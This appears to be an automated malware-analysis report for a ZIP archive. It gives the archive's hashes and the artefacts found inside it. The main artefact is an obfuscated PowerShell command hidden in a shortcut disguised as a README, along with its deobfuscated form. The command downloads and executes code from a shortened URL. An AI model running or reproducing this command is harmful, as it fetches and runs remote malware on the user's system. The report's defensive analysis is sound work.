Malicious

e2ace0fefc172c3bd37a7b1ca6816957

ZIP Archive
|
MD5: e2ace0fefc172c3bd37a7b1ca6816957
|
Size: 228.02 KB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	e2ace0fefc172c3bd37a7b1ca6816957
Sha1	249b65cf90d24a3c8bb931fcedc245ae101b7ef8
Sha256	30a9c4ba3d66d96e68a705f677ef1de510c6a936a21691607d10611773683048
Sha384	2ca0c8ad7ed80bb01e7e1aa068ff7e8b54bda7c28a8530a2a0579f6380e0202aaf730050b5f89e4eb79f439c3813b2ec
Sha512	88d71ade1181328030bdee65f712eccf9b2f350bae0f31aea3e4a6ad282e9de3887418f203f9de23933eba6def56fcbc6a26ef565c197f93e9d8eed49f319369
SSDeep	6144:2ZfOGlQ0CLy4XdmwZAWlN7ukunNfvs+bvz8P5mRf:I2sQ5QwZJjcs+UP0t
TLSH	D62423A3BDE01464E56FDEF7FA8D554587973CAC0087D0D8E64AB80D07ABBFC2586490

File Structure

Artefacts

Name0	Value
LNK: Command Execution	conhost.exe powershell set-clipboard i; sleep 1; sal $DebugPreference ('sA'+'L'); SilentlyContinue $PSSessionApplicationName((Get-Clipboard)+'wr'); SilentlyContinue $env:SESSIONNAME((Get-Clipboard)+'ex'); console (wsman ('tinyurl.com/35t9kjvh'))
Deobfuscated PowerShell	Set-Clipboard "i" sleep 1 sal $DebugPreference "sAL" silentlycontinue $PSSessionApplicationName ((Get-Clipboard) + "wr") silentlycontinue $env:SESSIONNAME ((Get-Clipboard) + "ex") console (wsman "tinyurl.com/35t9kjvh")

e2ace0fefc172c3bd37a7b1ca6816957 (228.02 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	conhost.exe powershell set-clipboard i; sleep 1; sal $DebugPreference ('sA'+'L'); SilentlyContinue $PSSessionApplicationName((Get-Clipboard)+'wr'); SilentlyContinue $env:SESSIONNAME((Get-Clipboard)+'ex'); console (wsman ('tinyurl.com/35t9kjvh')) Malicious	e2ace0fefc172c3bd37a7b1ca6816957 > Scalper Dream > README - Best Indicators.lnk
Deobfuscated PowerShell	Set-Clipboard "i" sleep 1 sal $DebugPreference "sAL" silentlycontinue $PSSessionApplicationName ((Get-Clipboard) + "wr") silentlycontinue $env:SESSIONNAME ((Get-Clipboard) + "ex") console (wsman "tinyurl.com/35t9kjvh") Malicious	e2ace0fefc172c3bd37a7b1ca6816957 > Scalper Dream > README - Best Indicators.lnk > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙